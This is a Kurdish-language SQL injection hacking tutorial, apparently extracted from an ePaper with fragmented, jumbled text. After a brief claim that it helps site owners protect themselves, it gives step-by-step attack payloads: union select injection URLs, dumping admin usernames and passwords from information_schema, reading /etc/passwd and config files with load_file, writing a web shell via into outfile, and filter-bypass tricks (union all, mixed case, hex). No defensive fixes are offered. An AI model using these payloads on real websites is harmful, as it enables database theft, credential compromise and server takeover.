SQL Injection Attacks - Intelligent Exploit

SQL Injection Attacks 

- 1 - 

@ @@ @


بسم الله الرحمن الرحيم 

سبحانك العلم لنا اال ما علمتنا انك انت العليم الحكيم 

-------------------------------------------------------------- 

@@Z@ 

لهگهڵ بهرهو پێش چوونی تهكنهلۆجيا و به تايبهت بواری كۆمپيوتهرو 

ئهتهرنێت ھێرشهكانی ھاكرزهكان ڕوو له زياد بوون دهكات و ڕيگه و 

يهكێكه لهو 

شێوازی نووێ دهدۆزرێتهوه.‏ ھێرشی 

ھێرشانه يان دهتونين بڵێن يهكێكه له كه زۆر ئاسانه و زۆر مهترسی 

داره بۆ سهر ماڵپهر كهچی زۆربهی پهره پێدهرهكان مهترسی ئهو 

SQL Injection 

. 

- 2 - 

@ @@ @


ھێرشانه نازانن يان ھهر بگره زۆر جار ئهگهر باسی بكهی گاڵتهيان پێدێ 

بۆ خۆپاراستنی سهرهتايشی بۆ ناكهن.‏ 

نازانن كهزۆر مهترسيداره ئهگهرچی له ڕووی جێبهجێكردنی تا 

ڕادهيهك ئاسانه بهاڵم زۆر كاريگهره بۆ سهر ماڵپهڕ كه دهتوانی 

ڕاستهوخۆ زانياری له داتابێزهوه دهربێنی . من كه باسی دهكهم تهنھا بۆ 

ئهوه نيه تا بتوانين زانياری ماڵپهڕيك دهربێنن يان ناو پاسۆردی بهكار 

ھێنهرێك دهربێنن بهڵكو مهبهستی دووهم ئهوهيه تا خاوهن ماڵپهر و 

داڕێژهی ماڵپهر بزانن كه چهند مهترسی داره تا بهاليهنی كهم ڕيگهی و 

شێوازی ھێرشهكه بزانن تا ماڵپهڕهكهيان لهو جۆره ھێرشانه پارێزراوبێ 

‏.له كۆتای دا باسی يهكێك له وھێرشانهدهكهم كه دهنگدانهوهيكی مهزنی 

ھهبوو.‏ له 17 اوغست ی ساڵی 2009 وهزارهتی دادی ئهمريكی پياوێكی 

ئهمريكی و دوو گهنجی ڕووسی دادگايی كرد كه ھهڵسابوون به دزينی 

كه 

130 مليۆن ژمارهی بانكی له ڕيگهی ھێرشی 

ھێرشيان كردبووه سهر چهند كۆمپانيايهكی زبالح ی وهك , 7-Eleven 

SQL Injiction 

Hannaford Brothers 

بۆيه تاچهندی بزانی ئهوهنده دهتوانی خۆت بپارێزی ئهگهر ھيچی لێ 

نهزانی ئهوه ناتوانی خۆتی ڵێبپارێزی 

. 

AnGrY BoY 

- 3 - 

@ @@ @


باسی ئهو چهند خاڵهی خوارهو دهكهم ھيوادرام سوودی ڵيوهرگرن : 

Field و Table 


.1 

.2 

3 

پێناسهی 

دۆزينهوهی ھهڵه و دهرھێنانی زانياری گرنگ 

بهيهك جار 

ده.‏ رھێنانی زۆرترين 

‎4‎‏.خوێندنهوهی فايلی گرنگ 

‎5‎‏.چاره سهركردنی ھهندێ له كێشهكان 

----------------------------------------------------------------------------- 

- 4 - 

@ @@ @


(SQL) 

چيه ؟؟ كورت كراوهی 

‏(لغة االستعالم البنيويه)‏ بهكورتى زمانێكه قسه لهگهڵ داتا بێز دهكات 

دهتوانی لهڕێگه يهوه زانياری له داتا بێز وهرگری و نوێ بكهيهوه و.‏ 

وهھهروهھا دهتوانی خشته دورست بكهين و بيسڕينهوه بهتاڵيبكهينهوه 

دهستكاريبكهين و چهندين كرداری تر.‏ 

لێره ناتوانين باسی زمانی بكهين بهڵكو بهكورتی باسی ھهڵهی 

دهكهين كه ناسراوه به SQL Injection له داتا بێزی 

من باسی ھهموويان ناكهم 

‏.بهڵكو تهنھا باسی دهكهم لهگهڵ سكريپتی php ‏.لهو چهند 

دێرهی خوارهوه دێن به زمانێكی ساده و به شێوهيكی كورت و پوخت باس 

دهكهين تا ھهموو كهس لێی تێبگات 

Structured Query Language 

. 

access- 

( Mysql 

SQL 


-Oracle— mysql ) server 

( Mysql ) 

. 

‎1‎‏.پێناسهی SQL Injection 

باڵو ترين و باو ترين و ئاسانترين ھهڵهيه له سكريپتهكانی ماڵپهڕ دا ھهيه 

به شێوهيكی زۆر باڵوه وه زۆر ئاسانه لهجێبهجێكردنيدا ئهگهر بێتی 

داڕيژهكه دانهنابێ كه دهتوانی له ڕێگهی ڵێدانی كۆدهكانی 

زمانی وه زانياری پێويست دهربھێنی له ناو داتا بێزهوه 

. 

(Filter) 


. 

SQL لهسهروه باسمان كرد زمانێكه له زمانهكان 

له زمانی كوردی نازانم به زاراوهی زانستی چی 

پێدهگوترێ ؟؟!!‏ بهاڵم ووشهكه مانای دهرزی لێدان دێ له زمانی عهرهبی 

له زمانی 

پێدهگوترێ ‏(الحقن)‏ بۆيه دهربڕينی مانای 

Injection 

Injection 

- 5 - 

@ @@ @

نكا 


كوردی زهحمهته واتاكهی بهم شێوهيه بێ.‏ بهس ئێمه تهنھا پێويستيمان به 

مانهكهی ھهيه نهك وهرگێڕانی زاراوه 

!!! 

بۆ كار ئاسانی تا بتوانی به ئاسانی زانياری به دهست بێنی 

magic_quotes_gpc 

: 

= 

باشتره off 

داخراو بی واتا چااڵك نهبی 

. 

- 6 - 

@ @@ @


‎2‎‏.دۆزينهوهی ھهڵه و دهرھێنانی زانياری گرنگ 

چۆن دهزانين ئهو سايته ھهڵهی ھهيه ؟؟؟ 

بۆ نموونه سايتێك دهكهينهوه تهماشا بكه وهك ئهو نموونهی خوارهوه 

له كۆتايی دا نوسراوه 

وهك ئهم وێنهی خوارهوه 

http://localhost/file.php?id=1 

file.php?id=1 

ئهوهيان گۆڕاوه ھهڵهكه ڵێرهيه.‏ 

- 7 - 

@ @@ @


لهپاش ژماره يهك ئهم ھێمايه 

چی پێشان دهدات 

وێنهی خوارهوه 

) ' ( بنووسهو پاشان 

http://localhost/file.php?id=1' 

ئينتهر بكه بزانه 

ئهگهر ھاتوو نامهيكی لهو شێوهيه دهرچوو 

ھهڵهيهك ھهيه يان تهنھا نووسرابوو 

وهك وێنهی سهرهوه دهڵێ 

- 8 - 

@ @@ @


You have an error in your SQL syntax 

يان نوسرابوو 

Warning: mysql_fetch_array(): supplied argument 

is not a valid MySQL result resource in 

/home/user/public_html/files.php 

يان بهو شێوهيه 

Warning: mysql_result(): supplied argument is 

not a valid MySQL result resource in 

ئهوه بزانه ئهگهری ئهوهی ھهيه ھهڵهی ھهبێ مهج نيه له 100% ئهو 

سايته ھهڵهی ھهبی بهاڵم ئهگهری ئهوه ھهيه 75% ھهڵهی ھهبێ.‏ 

وهك ئهم ووێنهی خوارهوه 

- 9 - 

@ @@ @


ئێستا زانيمان كه ھهڵهی ھهيه چۆن زانياری گرنگ وهرگرين له ڕێگهی 

ئهو ھهڵهيه ؟؟؟ 

پاش ئهوهی زانيمان ئهو سايته ھهڵهی ھهيه با بيێن زانياری گرنگ و 

پێويست دهربێنين وهك 

بۆ زانينی ناو و پاسۆرد دهبێ يهكهم چار ژمارهی column بزانين.‏ 

لهدوای گۆڕاوهكه 

ھهڵدهستين به نووسينى 

( واتا داوا دهكهی كه ژمارهكهمان پێ بڵێ 

Password & User Name 

order by 

order by ) 

- 10 - 

@ @@ @

Sql 


وهك لهسهرهوه باسم كرد پشت به فرمانهكانی زمانی 

زمانی زۆر نزيكه له زمانی ئاسای.‏ 

بهم شێهوهيه ژمارهی دهردينين 

دهبهستين 

column 

Sql 

وهك ئهم وێنهی خوارهوه 

- 11 - 

@ @@ @


(/*) 

(--) 

-: 

يان مانای كۆتای دێڕ يان داخستنی يان 

ئهوهی له دووای دێ بهمانای پێناسه دێ واتا كارناكاته سهر كۆدهكان 

له ژمارهيكهوه دهست پێدهكهی تا ھهڵهكه له الپهڕهكه وون دهبی بۆ 

نموونه له ژماره 10 دهست پێبكه ئهگهر ھهڵهكه ھهر مابوو ئهوه بيكه 

وهھهروهھا تا ھهڵهكه 

بيكه ئهگهر ھهر مابوو ئهوه بيكه يان بهاليهنيكهم گۆڕانكاری بهرچاو 

لهسهر الپهڕهكه وون دهبی ڕووبدات له الپهڕهكه.‏ 

كهيه بۆ 

له كام ژماره ھهڵهكه وون بوو ئهوه ژمارهی 

مان 

ئێستا ژمارهی نموونه له ژماره 8 ھهڵهكه ون بوو زۆر 

وهك ئهو وێنهی خوارهوه له ژماره زانی كه ژماره كهم بۆوه 

9 

http://localhost/file.php?id=1+order+by+10-- 










Column 

Column 

8 ھهڵهكه 

6 

7 

. 

8 بيكه 

8 

- 12 - 

@ @@ @


پاش ئهوهی ژمارهی column مان زانى دێين فرمانی 

بهكار ھێنانی 

بهم شێوهيه بهكار دێ 

union select 

Union select 

بهكار دهێنين.‏ 

و دهرھێنانی زانياری 

http://localhost/file.php?id=-1+union+select+1,2,3,4,5,6,7,8-- 

- 13 - 

@ @@ @


id 

نێوان 8-1 

(-) 

لهگهڵ دانانی ھێمای كهم له دوای گۆڕاوی پاشان دهبينی له 

ناو الپهڕهكه چهند ژمارهيهك دهردەچێت له لێرهوه زانياری 

گرنگ وهردهگرين.‏ 

وهك ئهم وێنهی خوارهوه سهرنج بده بهم شێوهيه دهنووسرێ 

لهوانهيه پرسيار بكهن بۆ تا ژماره 8 مان نووسيی بۆ ؟؟؟ وهاڵم چونكه 

ھهڵهكه له ژماره 8 وون بوو واتا ژمارهی 

column كهيه 

- 14 - 

@ @@ @


وهك له وێنهكه دياره ژماره 2 پيشان دا كهواته ئهوهی دهمانهوێ 

بيبينينهوه وهك ڤێرژن و ناوی داتا بێز و يوزهر ھهمووی له شوێنی 

ژماره 2 دهنووسين 

سهيری وێنهی خوارهوه 

بۆ نموونه بۆ زانينی ڤێرژن ده نووسينی 

له بهستهرهكه له شوێنی ژماره 2 

@@version يان 

version() 

:- مهبهست له 

MySQL version 

زانينی ڤێرژن مهبهستمان ڤێرژنی 

MySQL واتا 

2 پيشان 

. 

وهك دياره له وێنهكه له ناو الپهڕهكه لهجێگای ئهوهی ژماره 

بدا ڤێرژنهكهی پيشانداين 

- 15 - 

@ @@ @


بۆ زانينی يوزهر user() 

بۆ زانينی داتا بێز 

database() ئهوهش ناوی داتا بێز 

- 16 - 

@ @@ @


نوسينی ئهو فرمانانهی سهرهوه له شوێنی ژمارهكه زانياريهكانت پێدهدا 

بۆ زانينی ناوی يوزهر و پاسۆرد ھهلدهستين به دهرھينانی ئهو 

زانيارانهی خوارهوه..‏ 

دۆزينهوهی خشته جهدول 

بهم شێوهيه دهنووسرێ وهك ئهم وێنهيه 

( 

Table ) 

http://localhost/file.php?id=- 

1+union+select+1,2,3,4,5,6,7,8+from+admin-- 

- 17 - 

@ @@ @


ووشهی From 

بۆ دهستنيشانكردن بهكاردێ 

-: 

-: 

ووشهی ئهدمين ناوی جهدوهلهكهيه واتا خشته (Table) ئهو خشتهيه 

لهخۆ دهگری ھهر Field زانياری گرنگ لهخۆ 

دهگرێ.‏ 

بۆيه مهرج نيه له ھهموو سكريپتهك ھهر بی بهگوێره 

سكريپت دهگۆڕی 

admin 

. 

چهند Field 

- 18 - 

@ @@ @


:- ھهندێ ناوی جهدولهكان 

user , admin , member , login , moderator , administrator 

ئهگهر ناوی خشتهكه تهواو بوو ئهو ژمارهكه وهك خۆی دهردهچيتهوه له 

ناو الپهڕهكه وه ئهگهر ھهڵه بوو ئهوه ھهڵه پيشان دهدات له ناو الپهڕهكه.‏ 

بۆ نموونه گريمان ناوی خشتهكه تهواو بوو ژمارهكه وهك خۆی 

دهرچوو دوای چ دهكهين 

؟؟ وهك ئهم وێنهی خوارهوه 

- 19 - 

@ @@ @


ھهڵدهستين به نووسينی ناوی 

بۆزانينی ناو واتا 

Field 

user name 

له شوێنی ژمارهكه 

بهم شێويه دهنووسين 

وهك 


1+union+select+1,user,3,4,5,6,7,8+from+admin-- 

وهك بينيتان له شوێنی ژماره 2 له ناو بهستهرهكه نوسيم user 

دهبينين له شوێنی ژمارهكه ناوهكه دهردهچی واتا user name 

شێوهيه كه له وێنهكهی خوارهوه دياره 

بهم 

. 

- 20 - 

@ @@ @


user 

تێبينی \\ 

مهرج نيه تهنھا 

بێت وهك گوتم به گوێرهی سكريپت 

دهگۆڕ وهك username , user, usr, user_name 

دهرھێنا 

User nam مان ئهو جاره با پاسۆردی دهربێنين 

وه ھهرروهھا بۆ زانينی ووشهی نھێنی واتا پاسۆرد password 

دهنووسين يان 

ئهوا 

pwd يان password 

pass 

- 21 - 

@ @@ @

بهم شێوهيه دهنووسرێ 


تهماشای ئهو وێنهی خوارهوه بكه 

http://localhost/file.php?id=-1+union+select+1, 

password,3,4,5,6,7,8+from+admin-- 

دهبينين له شوێنی ژمارهكه ووشهی نھێنی دهردهچی واتا 

يشمان دهرھێنا.‏ 

بهم شێوهيه 

passwor 

password 

-: 

concat(password,0x3e,user) 

بۆ بهستنهوهی ھهردوو فرمانهكه ئهم دهستهواژهيه 

بهم شێوهيه 

بهكار دينين 

بۆ بهستهوهی فرمانهكان بهيهكهوه يان دانانی دوو فرمان 

بهجارێک 

Concat 

. 

- 22 - 

@ @@ @

یوه 


0x3e 

ئهوهيان وهك ناوبڕه دادهندرێ تا تێكهڵ نهبی ھهردوو فرمانهكه 

ئهوه بريتيه له < ئهو ھێمايه بهاڵم به شێوهی ھيكس 

ئهوه تهنھا بۆ زانياری.‏ 


1+union+select+1,concat(password,0x3e,user),3, 

4,5,6,7,8+from+admin-- 

!! 

بهڕێزان فايلێكی ڤيديۆی لهگهڵه به ناونيشانی ) سهرهتا و دۆزينه 

ھهڵه)‏ كه بهديژی ئهوهی له خاڵی يهكهم باسم كردووه به وێنه به ڤيديۆ 

باسم كرديه بۆ زياتر تێگهيشتن 

- 23 - 

@ @@ @

شوه 


table 

وه ھهندێ ناوی و الپهڕهی ئهدمينی ئهوهی پێوست بووه بۆ 

ئهو باسه سهروه دام ناوه له ناو فايلی 

!! 

txt 

------------------------------------------- 


.3 

بهيهك جار 

دهرھێنانی زۆرترين 

له سهرهوه باسی دهرھێنانی زانياری وهك يوزهر و پاسۆردم كرد كه 

پێويست به و ن ھهبوو ھهتا بتوانين يوزهرو پاسۆرد 

دهربێنين ئهويش به دانانی ناوی كان و هكان ئه 

دهبوايه به مهزهنده دايبنێين دڵنيا نهبووين ئايه ڕاسته يان ھهڵهيه دهبی 

دووباره تاقی بكهيهوه ھهتا به تهواوی دهبيينيهوه ئهوه تهنھا له ڤێرژنی 

وهھايه . له فێرژنی زۆر ئاسانه دهتوانی به ماوهكی كهم زۆرترين 

زانياری وهرگری.‏ 

باشه چۆن بزانين ئهوه ڤێرژنی 4 يان 5 ه ؟؟؟ واڵم لهسهرهوه باسم كرد 

يان 

له شوێنی ژمارهكه دهنووسی 

ئهوكات دهزانی 4 يان 5 ئهگهر 4 بوو ئهوه له خاڵی 3 م باسم كردووه 

بهاڵم ئهگهر 5 بوو ئهوه زۆر ئاسانه ئێستا باسی دهكهن 

بهم شێوهی خوارهوه دهنوسرێ.‏ بۆ زانينی ڤێرژن وهك باسم كرد له 

شوێنی ژمارهيك دهنووسی @@version سهيری ئهو وێنهيه بكه 

4 

Field 

version() 

Table 

@@version 

Field 

5 

table 

- 24 - 

@ @@ @


له شوێنی ژماره 1 دهنووسی @@version وهك ئهو وێنهی خوارهوه 

- 25 - 

@ @@ @


زۆر باشه ئهوه زانيمان فێرژنی 5 ه پاشان ؟؟ 

بۆ ئهوهی تهيبڵهكان به ئاسانی ببينينهوه ئهوه دهبی ناوی تهيبڵهكان له 

نێوان دوو ھێمای له سهدا بنووسين پاشان بيگۆڕين بۆ MySQLCHAR 

چۆنيهتی گۆڕينی بۆ MySQLCHAR دهتوانی له ڕێگهی توڵباريێكی 

بهناوی يان بهرنامه ھهيه 

تايبهت به گۆڕين 

سهيری ئهو وێنهی خوارهوه بكه 

hackbar 

تايبهت له Mozilla Firefox 

- 26 - 

@ @@ @


پاشان پهنجهرێك دهبيتهوه ئهوهی مهبهسته لێبنووسه بۆ نموونه دهمانهوێ 

بدۆزينهوه ئهوه دەنووسين %admin% 

ناوی 

پاشان 

ئهوهی دهنووسی بۆ دهرھێنانی 

پاسۆرد 

ى بۆ دهرھێنانی دهيكاته 

دوای دهيكهینه 

دهنووسين %User % 

table 

MySQLCHAR 

admin ی table 

table user 


%pwd% 

ok 

دوای ئهوهی كه نووسيمان %admin% 

ئهو وێنهی خوارهوه 

پاشان كليكی 

بكه وهك 

- 27 - 

@ @@ @


كه كليكی 

كرد ئهوه پهنجهرهكه دادهخرێ ئهوهی نوسيوته دهيكاته 

ئامادهيه بۆ بهكار ھێنان وهك وێنهی خوارهوه 

ok 


- 28 - 

@ @@ @


ئهو ڕستهيه كه دهرچووه له وێنهكه ئاماژهم پێدايه كۆپی بكه له كۆتايی 

بهستهرهكه دايبنێ لهگهڵ دانانی 

concat(table_name,0x3e,column_name,0x3e,ta 

ble_schema) 

له شوێنی يه كێك له ژمارهكان . 

لهگهڵ دانانی 

from+information_schema.columns+where+colum 

n_name+like+ 

له كۆتايی ژمارهكان 

لهگهڵ دانای 

ھهموويان.‏ 

له كۆتايی 

CHAR(37, 97, 100, 109, 105, 110, 37) 

- 29 - 

@ @@ @

له كۆتايی بهستهرهكه دهبێته 

ئهوهی زياد كراوه بريتيه له 



1+union+select+1,2, 

concat(table_name,0x3e,column_name,0x3e,tab 

le_schema),4,5+from+information_schema.colu 

mns+where+column_name+like+ CHAR(37, 97, 

100, 109, 105, 110, 37)-- 

: واتا له ھهرشوێنيك بی 

where 

: Like واتا ھاوشێوهی لێكچوو 

-: 

( % ) 

% % 

ھێمای له سهدا واتا ھهر ووشهيهك پێك ھاتبی له و 

پيتانهی له نێوانمان نووسيه 

بۆ نموونه ئێمه زۆر جار له ناو ويندۆز دهگهڕين به دوای بهرنامهكان 

دهنووسين واتا ھهر فايلێك بهشێوهی بی بيدۆزهوه 

ئهو ووشهی سهرهوه ھهمان مانی ھهيه له زمانی 

exe 

sql 

*.exe 

+where+column_name+like+%user% MySQLCHAR -- 

pass 

له كۆتايی ڕستهكه دهبێته :- 

دهری بێنه.‏ 

له ھهر شوێنێك ووشهی 

ھهبێ 

- 30 - 

@ @@ @


pass User 

-: 

admin , password , pwd , username , name 

, login , admin_name 

بيكه 

ئهگهر به ناوی 

يان 

وه ھهروهھاااااا 

دهرنهچوو ئهوه 

پاشان انتربكه دهبينی 

table كان پيشان دهدا وهك ئهو وێنهی خوارهوه.‏ 

- 31 - 

@ @@ @

كوه 


پاشان بۆ ناوی پاسۆرد ھهمان كردار تاقی كهوه 

ئهوجاره بۆ پاسۆرد بنووسه 

نوسيمان 

وهھهروهھااا..‏ 

لهسهروه كه 

%pwd% , 

%admin% 

%pass%, 

ئهو وێنهی خوارهوهتهماشاكه من ووشهی 

سهركهوتووبوو سهيركهن 

%pwd% تاقی كردهوه 

. 

- 32 - 

@ @@ @


له كۆتای سهيركهن به ئاسانی 

user , password مان دهرھيناا 

- 33 - 

@ @@ @


-: 

) 

به ڤيديۆ ئهوهی لهسهره باسم كرد بۆتان شيکراوهتهوه به 

له ڤێرژنی 5) بۆ زياتر 

ناوی دهرھێنانی زۆرترين 

تێگهيشتن.!‏ 


-------------------------------------------------- 

- 34 - 

@ @@ @


4. خوێندنهوهی فايلی گرنگ و بهرزكردنهوهی فايل 

ئاسانترين ڕيگه بۆ ھاكردنی سايت له ڕێگهی ھهڵهی له ڕيگهی 

ئهم فرمانهوهيه ئهويش فرمانی 

بهم شێوهيه بهكار دێ 

ڕێڕهوی ئهو فايله بنووسه كه دهتهوێ 

يان له شوێنی 

بيخوێنيهوه 

ئهوهش پێويسته 

دهتوانی ئهم فرمانه جێبهجێ 

چۆن دهزانی 

بكهی 

ئهگهر ھهڵهی پيشان دا يان الپهڕهكه سپی بوو ئهوه دياره ئيش ناكات 

ئهگهر زانياری پيشاندای ئهوهبزانه ئيش دهكات 

چۆنيهتی بهكار ھێنانی ئاسانه له شوێنی ژمارهكه دهنوسين 

sql 

load_file 

load_file('/etc/passwd') 

/etc/passwd' 

magic quotes=OFF 

magic quotes=OFF 

load_file('/etc/passwd') 


load_file('/etc/passwd'),3,4,5+admin 

بۆ خوێندنهوهی فايل دهتوانی ڕێڕهوی فايلهكه بنووسی وهك ئهو نموونهی 

خوارهوه 

/home/h4kurd/public_html/Config.php 


load_file(/home/h4kurd/public_html/config.ph 

p),3,4,5+admin-- 

بهم شێوهيه زانياری كۆنفيگ پيشان دهدات له ناو الپهڕهكه زۆر جار ئهو 

فرمانانه به شێوهی ئاسای ئيش ناكات دهبێت بيكهیته ھيكس 

تا وهكو ئيش بكات ئهويش بهم شێوهيه دهبی.‏ 

hex 

- 35 - 

@ @@ @


Unhex(hex(load_file(0x and command))) 

or load_file(0x and command) 

. 

بۆ گۆڕينی فرمانهكان بۆ ھيكس ئهوه ڕيگه زۆرن پێويست ناكات باسی 

بكهين بهرنامهيكی بچووك دادهنێم بۆتان بۆ گۆڕينی فرمانهكان بۆ 

ھيكس.!‏ 

into+outfile 

-: 

دهبێ 

لهڕێگهی فرمانی 

فۆڵدهرێك لهناو ھۆستهكه ھهبی به جمۆدی 777 واتا ڕێگه پێدراو بی به 

بهرزكردنهوهی فايل 

ئهوكات دهتوانی فايلێك دورست بكهی پاشان كۆدی ھهڵهی تێدا 

بنوسيهوه پاشان شێڵ ئهپڵۆد بكهی 

فرمانهكه بهم شێوهی خوارهوه دهنووسرێ 

http://localhost/file.php?id=-1+union+select+1, ,3,4,5+into+outfile"/home/h4kurd/p 

ublic_html/folder/h4kurh.php" 

ئهگهر سهركهوتوو نهبووی 

شێوهی خوارهوهی لێدێ 

فرمانهكه 

دهگۆڕين به 

تشفيری 

ھيكس بهم 

 

ئهم كۆدانه دهكهينه تشفيری ھيكس 

- 36 - 

@ @@ @

یوه 


http://localhost/file.php?id=-1+union+select+1, 0x and code 

,3,4,5+into+outfile"/home/h4kurd/public_html/folder/h4kur 

h.php" 

بهم شێوهيه دهتوانی فايلێك دوورست بكهی و ھهڵهی تێدابی ئهوكات شێڵ 

بهرز كهوه 

بۆ زانياری زياتربه ڤيديۆ باسی چۆنيهتی خۆيندنهوهی فايلی گرنگ و 

بهرزكردنهی فايلم كرديه دامناوه بۆتان به ناوی ‏(خوێندنه فايلی 

گرنگ)‏ 

--------------------------- 

- 37 - 

@ @@ @


5. چاره سهركردنی ھهندێ له 

كێشهكان 

چارهسهری Forbidden 

زۆر جار له كاتی نوسينی فرمانهكانی وهك 

الپهڕهيك دهردهچێ دهنووسرێ Forbidden 

بۆ چارهسهری ھهڵسه به نوسينی ئهم فرمانه له نێوان 

بنووسه وهك ئهو نموونهی خوارهوه 

union select 

union select 

union select 

all 


1+union+all+select+1,2,3,4,5+admin-- 

به گۆڕينی 

يان ھهڵسه به گۆڕينی شێوهی نوسينی 

شێوهی پيتهكان به گهورهو بچووك وهك 

چونكه زۆر جار فلتهری لهسهر دادهندرێ بهم شێوه 

تۆ كه ياری به پيتهكان دهكهی 

ئاسايه دادهندرێ 

ئهوه نايناستهوه 

يان ووشهی 1+1 and له پێش گۆڕاوهكه واتا بهم شێوهيه 

union select 

UniOn SlEcT 


1+and+1=1+union+all+select+1,2,3,4,5+admin-- 

بهاڵم ئهمهشه له ھهموو كاتێك سهركهوتوو نابێ ئهوجاره ھهڵسه 

گۆڕينی به شێوهی تشفيری ھيكس واتا فرمانهكان بكه به ھيكس..‏ 

به 

دۆزينهوهی تهيبڵهكان 

لهكاتی ھهبوونی كێشه 

- 38 - 

@ @@ @

یڕه 

یوه 


( 

) 

له سهرهوه باسم كرد بهشێوهی ئهگهر بێت و فيرژنی له خوارووی 5 بی 

يان لهبهر ئهوهی ھهندێ كات دهسهاڵتت نادات تهيبڵهكان ببينی ئهوهبه 

مهزهندهكردن تخمين دايدهنێين واتا يهك يهك تاقی دهكهينهوه بهاڵم 

ڕيگهی تر ھهيه بۆ ئاسانكاری له كاتی تاقی كردنوهی تهيبڵهكان 

ھهندێجار ھهيه سكريپت تايبهته به بابهتێك وهک 

بۆيه ئاسايه ئهگهر ناوی تهيبڵهكان ببێته 

. 

sound 

sound_user 

سكريپتی دهنگی 

sound_pass , 

يان ئهگهر سكريبتهكه ناسراو بوو ئهوه ھهڵسه به دابهزاندنی سكريپتهكه 

لهسهر كۆمپيوتهرهكهت تهماشای تهيبڵهكان بكه بۆ دۆزينهوهيان 

وه ئهگهر سكريپتهكه نهناسراو بوو ئهوه دهتوانی بگهڕێ له 

به دوای ھهمان سكريپت بهاڵم لهسهر ڤێرژنی ئيشبكات وهك له خاڵی 

5 هم باسم كرد ئهوكات بهئاسانی تهيبڵهكان بدۆزهوه.‏ 

google 

5 

admin 

view source 

بدۆزهوه 

وه ئهگهر ھهرسهركهوتوو نهبووی ئهوه الپه 

بكه 

كليكی الی ڕاست بكه پاشان كليك لهسهر 

تهماشای كۆدهكان بكه لهوێ زۆرجارزانيارى بةسوود دهنوسرێ 

يان ھهلسه به تاقی كردنه 

ئهگهر سايتهكه ناوی 

بنووسه 

h4kurd.com 

ناوی سايتهكه و تهيبڵ وهك بۆ نموونه 

بوو ئهوه تهيبڵهكان بهم شيوهيه 

h4kurd_user 

h4kurd_pass 

. 

- 39 - 

@ @@ @


kurd 

يان ناوی داتابێزی وهرگره 

بوو ئهوه بهم شێوه لێبكه 

بۆ نموونه ئهگهر ناوی داتا بێزی 

kurd_user 

kurd_pass 

ئهو ڕيگهيه بۆ ئهو سكريپتانه زۆر سهركهوتووه كه بهتايبهت دوورست 

دهكرێ . 

-------------------------------- 

بۆ زانينی چۆنيهتی دابهزاندنی سكريپت لهسهر كۆمپيوتهر وهتاقی 

كردنهی ھهڵهی sql inection به ڤيديۆ شيمكريتهوه چۆنيهتی دانانی 

سكريپت لهگهڵ بهرنامهی پێويست بهناوی دابهزاندنی سكريپت و 

بهرنامهی پێويست )..... 

) 

------------------------------------------- 

- 40 - 

@ @@ @

یوه 


بۆ زياتر زانياری دهتوانی سهردانی ئهو بهستهرانهی خوارهوهبكهيت 

SQL Helper 

http://h4kurd.com/h4kurd/thread-8812.html 

شيكرنهوه بهرنامهی 

چارهسهری پيشاننهدانی table 

له كاتی Injection 


سهرهتايهك بۆ فێربوونی ھاكی سايت له 

ڕێگهی sql injection 


SQL ھهتا ھێنانی 

r00t 


چارهسهركردنی Forbidden له Injection 


------------------------------------------------------------ 

لهكۆتايی دا دهڵێم ئهو چهند دێرهی سهرهوه كورته پێناسهيكه ھێرشی 

بوو ھيوادارم سوودتان لێوهرگرتبی 

بێگومان ئهوهی نوسيومه بێھهڵه نيه بۆيه داوای ڵيبوردن دهكهم له 

ھهموو ھهڵهكان ئهو زانياريانه به گوێرهی تێگهيشتنی و تاقی كردنه 

خۆمه.‏ 

--------------------------------------------- 


- 41 - 

@ @@ @


دوای ڵيبووردن له ھهموو ئهو كهسانه دهكهم كه زيا نێكی بچوكم 

پێگهياندبی چ بهبێ ھۆ يان له ئهنجامی كاردانهوه . 

- 42 - 

@ @@ @


- 43 - 

@ @@ @

SQL Injection Attacks - Intelligent Exploit

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?